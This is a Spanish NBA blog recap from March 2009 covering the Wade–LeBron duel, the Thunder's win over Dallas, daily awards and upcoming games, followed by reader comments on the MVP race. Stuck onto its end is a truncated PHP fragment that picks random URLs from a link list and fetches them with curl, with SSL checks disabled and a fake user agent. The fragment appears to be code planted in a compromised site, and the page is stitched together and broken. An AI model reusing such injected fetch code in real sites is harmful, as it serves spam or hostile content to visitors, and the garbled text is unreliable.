La Crónica (02/03/2009)

03 de March de 2009 por TheDeerHunter

Pasote de duelo individual el que vivimos anoche. Wade Vs Lebron a la carrera por el MVP y los dos poniendo encima de la mesa lo mejor de su repertorio. Hoy por hoy, el más alto espectáculo que uno puede contemplar en términos individuales. Colectivamente, el choque lo ganaron los Cavs con un equipo a priori más preparado para hacerlo aunque Wade mantuvo a su equipo en la pomada hasta bien entrado el último cuarto, en el que sufrieron un carajal enorme contra la defensa contraria. No nos engañemos. Es casi imposible que King James no se lleve el MVP esta temporada, pero Wade ya está más que acostumbrado a batirse con lo imposible y habitualmente ha salido airoso. ¿Os jugaríais el sueldo del mes si, por ejemplo, los Cavs quedaran segundos del Este y Miami cuartos?

El petardazo de la jornada lo dieron los Thunder. Parece mentira que Dallas ya le viera las orejas al lobo la semana pasada pero es que anoche le vio los colmillos y hasta el esófago. El lobo anoche tomó la forma de Russell Westbrook que, rodeado de un equipazo formado por “ilustres” como Thabo Shelofosha, Kyle Weaver o Nenad Krstic (¡¡¡sin Durant ni Green!!!) les dio un baño en toda regla a los que hasta hace nada eran candidatos al título. Y el rejón aún pudo ser peor, ya que volvió Terry y lo hizo tan en buena forma como antes de la lesión. Nowitzki poco más pudo hacer cuando ningún otro titular fue capaz de alcanzar ni los 10 puntos.

Buen partido también en Philadelphia. Los Hornets, de la mano del mejor West de la temporada y de un gran Posey, tuvieron que sudar para doblegar a los Andre. Las acciones de “los abejorros”, al igual que las de Utah, comienzan a cotizar alto.

Menos problemas tuvo Atlanta en Washington con un Marvin Williams atravesando el periodo más dulce que se le recuerda y menos aún los tuvieron Spurs en casa de los Clippers, animalicos míos. Palizón de 30 puntos que se llevaron y es que ayer faltó de nuevo Zach Randolph, ausente debido a una grave enfermedad de su padre.

PREMIOS

MVP: Incapaces de decidir entre uno y otro y deslumbrados por la exhibición de ayer decidimos otorgar el premio a Lebron James y Dywane Wade, ex aquo. Finalmente la mayor calidad de los Cavs les dio la victoria pero el duelo individual quedará para la posteridad.

Rookie: No hay ningún tipo de duda hoy. Cuando un rookie consigue un triple doble lo que hay que hacer es aplaudirle y meterle de lleno en la lucha por el ROY. 17 puntos, 10 rebotes y 10 asistencias para Russell Westbrook.

Sorpresa: Ayer la figura de los Hawks parecía Marvin Williams: 28 puntos con 11 de 15 en tiros. Poco a poca el número 2 del draft del 2005 va dejando muestras de su calidad. Sin prisa pero sin pausa.

Decepción: En el Informe Semanal de ayer comentábamos que los equipos involucrados en la lucha por los Playoffs del Oeste estaban como un tiro por eso no entra en los planes de nadie la derrota de los Mavs frente unos Thunder sin Durant ni Green. A estas alturas cualquier error se paga muy caro.

El Mayor Esfuerzo en Vano: El de los Andre en su partido frente los Hornets. Tan solo ellos 2 plantaron cara con 58 puntos, 10 rebotes, 11 asistencias y 23 aciertos de 34 lanzamientos.

billupspistRAZONES PARA TRASNOCHAR

La madrugada del martes al miércoles nos trae un programa completo. No juegan ni Cavs, ni Celtics ni Spurs, pero sí Lakers, Magic o Nuggets, entre otros equipos de la zona alta. Nos quedamos con un partido y con un jugador.

Suns @ Magic. Shaq atraviesa su mejor momento desde que dejase los Lakers y se ha convertido en uno de los pocos jugadores de más de 35 años en anotar más de 35 puntos en dos partidos seguidos. Nos permitimos dudar, sin embargo, que esta noche prolongue esta racha. Delante tendrá a Dwight Howard, gran candidato al premio a Mejor Defensor del Año. El duelo dará inicio a la 1:00 (horario GMT+1).

Chauncey Billups. El base de los Nuggets hará su primera visita al Palace como ex piston. No tenemos ninguna duda de que Billups recibirá una gran ovación por parte del público de Detroit en homenaje a sus más de 7 temporadas vistiendo la camiseta de los Pistons. Billups, MVP de las Finales que dieron a la franquicia de Michigan su último título hasta la fecha, no tendrá delante a Iverson, con lo que al menos el público local se ahorrará el sufrimiento de compararlos cara a cara. El partido empezará a la 1:30 horas.

PREGUNTA DEL DÍA

Ya la hemos formulado más arriba: ¿Si los Cavs quedaran segundos en el Este y los Heat cuartos, os jugarías vuestro sueldo por el MVP de LeBron James? ¿Nos estamos olvidando de Kobe Bryant?

Comenta

15 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Yo no se que harán con el MVP, quien sabe cuantas ganas tienes de darselo a Lebron, quizá incluso mas de lo que nos imaginamos.

    Lo que tengo claro es que Wade en forma de momento le queda lejos a Lebron, en teoria Lebron tira mejor de lejos y no tiene absolutamente nada que envidiar en las otras facetas, además de la evidente superioridad física que tiene con el resto del planeta, pero la cuestión es Wade al final juega mejor, toma casi siempre las mejores decisiones en la pista que es lo que cuenta y a la vez es capaz de hacer las jugadas mas espectaculares, tanto por encima del aro, defendiendo y desde luego en tiros sobre la bocina.

    Para mi Lebron no ha llegado al nivel de Wade, Kobe o Duncan como jugador, un anillo y ciertos intangibles tienen la culpa.

      Citar

  2. UnderlocK dice:
    #2

    Una pena que ayer se le escapara el partido a Miami en el último cuarto.

    Sobre el MVP pienso que la cosa desgraciadamente estará entre Kobe y LeBron por el record de sus equipos. Para mi sin embargo deberia ser para Wade, pese a que el record de Miami sea mucho peor, la temporada de Flash esta siendo espectacular, y si le respetan las lesiones y el equipo se gestiona bien (teniendo a Riley detras todo es muy favorable), en 2 ó 3 años volveran a ser maximos aspirantes al titulo.

    Grande Pau siendo mejor jugador del mes de Febrero.

      Citar

  3. TheDeerHunter dice:
    #3

    ¿que yo tengo ganas de dárselo a Lebron??? ¿pero tú qué te fumas, muchacho???

    yo sueño con que se lo den a Pau… y si no a Kobe. ¡Nos ha jodio mayo con las flores!!!!

      Citar

  4. couxe dice:
    #4

    Yo creo que mucho deberían cambiar las cosas para que Lebron no se lo llevase… Pero bueno, me alegraría si al final le cae a Wade ya que se lo merece tambien…
    En cuanto a Bryant dudo bastante que se le lo lleve…

      Citar

  5. Viva_Dirk dice:
    #5

    Yo no fumo nada y tu deberias sosegar tus respuestas.

    Evidentemente me refiero al MVP que otorga la NBA, cuyos responsables creo que se mueren de ganas de darselo a Lebron.

      Citar

  6. nacho dice:
    #6

    joder vaya animos,ultimamente en los blog de NBA no veo mas que insultos y desconsideraciones,ahora ya participa de ellos hasta el que escribe la cronica,pero vamos la cronica esta bien y ha sido un malentendido asi que al lio.yo no me voy a poner a discutir cual de los dos es mejor,porque casi es como discutir si quieres mas a papa o a mama,pero si digo que el que me deja con la boca abierta partido si y partido tambien es wade,no solo por sus espectaculares penetraciones,sino porque tambien encuentra siempre las mejores soluciones,a sus compañeros y es un autentico killer con el partido apretado,a mi me parece mas jugador,sin desmerecer en absoluto a lebron.
    1 saludo

      Citar

  7. javi dice:
    #7

    La verdad es q lo del MVP es algo bastante subjetivo y que raramente suele contentar a todos.Ádemás todos hemos visto algún MVP de la temporada que en PO no ha hecho nada de nada. Se huele en el ambiente que en la nba están como locos x dárselo a Lebron, aunque Kobe se lo peleará hasta el final.

    En cuanto a la comparación de Lebron y Wade yo creo que hoy en día están al mismo nivel pro quizás da la impresión de tener un puntito más de competitividad Lebron y Wade la sensación de ser mucho más elegante.A día de hoy me kedo con…. Kobe XDD

    Cierto es que Wade ganó un anillo pro tb hay que ver con que equipo y que año. Una de las´mejores últimas temporadas de Shaq, un grupo de veteranos que no querían dejar la liga sin un anillo, una conferencia este que entonces estaba bastante débil respecto al oeste y sobre todo un equipo al que le temblaron las piernas al verse en una final. Pero bueno eso, los 2 unos cracks

    salu2

      Citar

  8. Viva_Dirk_vs_TheDeerHunter dice:
    #8

    jajajaja, vaya pike que os traeis ultimamente no??

      Citar

  9. TheDeerHunter dice:
    #9

    hombre viva… si te referías a que se mueren de ganas la frase “quien sabe cuantas ganas tienes de darselo a Lebron” lleva a equívoco… y como no es la primera vez que alguien insinúa que favorecemos a Lebron, pues…

    En cualquier caso, mi contestación no iba en el tono que has interpretado y no pretendía ser más que un chascarrillo sin pretensiones, aunque quizás haya parecido lo contrario. Ni éste ni ningún otro tendrán nunca como objetivo el ofenderte. No tengo ningún motivo para hacerlo… más bien todo lo contrario.

      Citar

  10. Jabho dice:
    #10

    Haya paz, que el quiere dárselo a LeBron soy yo….

    “pero la cuestión es Wade al final juega mejor, toma casi siempre las mejores decisiones en la pista que es lo que cuenta “…. y te quedas tan pancho Viva 🙂

    Pues no sé. A mi LeBron me parece poco estético pero por lo demás sigo pensando que es el jugador que mas diferencias marca en el juego ahora mismo. Wade es un crack, Kobe sin duda, pero para mi equipo elegiría a LeBron siempre.

    Lo del MVP es dificil porque siempre hay 2 o 3 que son justos vencedores ¿lo hubiera sido Paul el año pasado o Kobe el anterior? Sin duda que si, hubiera sido justo e injusto a la vez. Creo que la NBa que controla mucho el marketing se lo dará a LeBron porque “se lo debe” (igual que se lo debieron a Kobe otros años)

    Y no se si se insinúa que Lebron no rinde en PO. Ojala fuera así…

      Citar

  11. Txusma dice:
    #11

    Lo q tienen los errores tipograficos! Pq creo q lo q ha pasado es q Viva ha colado una “s” en el tienes en lugar de una “n”.
    Pero vamos, que tampoco hay para tanto. De momento estoy muy contento de estar en un blog que huye de los insultos gratuitos y q sus comentarios suelen ser siempre sosegados y con animo de debatir no de polemizar.
    Y seguro q todos estais de acuerdo conmigo.

    Y el MVP para Lebron, claro!! :D:D

      Citar

  12. arivas dice:
    #12

    A mi personalemnte me gusta mas Wade, pero creo que este año Lebron va a ser MVP y lo va a ser con todo merecimiento. Vale que venda mucho que sea Lebron, como bien apuntáis, pero chico es que la tremporada de Lebron está siendo fantástica. Sin duda lo merece

      Citar

  13. Pow_Brolin dice:
    #13

    Esto del MVP de la fase regular y demas parafernalia en forma de premios forma parte del atrezzo de la NBA y poco mas. Lo realmente importante es ser MVP de las finales … o mejor dicho lo que trae consigo ¬_¬!

      Citar

  14. Viva_Dirk dice:
    #14

    Ey Nacho, no creo que hallas leido desconsideraciones a nadie en este blog, creo que tenemos un grupo de gente cojonuda haciendolo y los que respondeis tampoco vais de ese palo.

    Es lo que dice Txus, yo estaba seguro de haber puesto ‘tienen’ y he puesto ‘tienes’, asi que nada que objetar al posterior comentario de Deer.

    Y si Mordaunt, no veo que tiene de raro mi afirmación, tomar las mejores decisiones en la pista me parece lo mas importante, y creo que Wade eso lo hace mejor que Lebron.

      Citar

  15. nacho dice:
    #15

    jejje ok ok ya veo que vais de buenas,lo ultimo que quiero son malos rollos,la verdad es que no conocia este blog lo he visto en un link del blog de Daimiel.Bueno nada habra que ir siguiendolo.
    saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>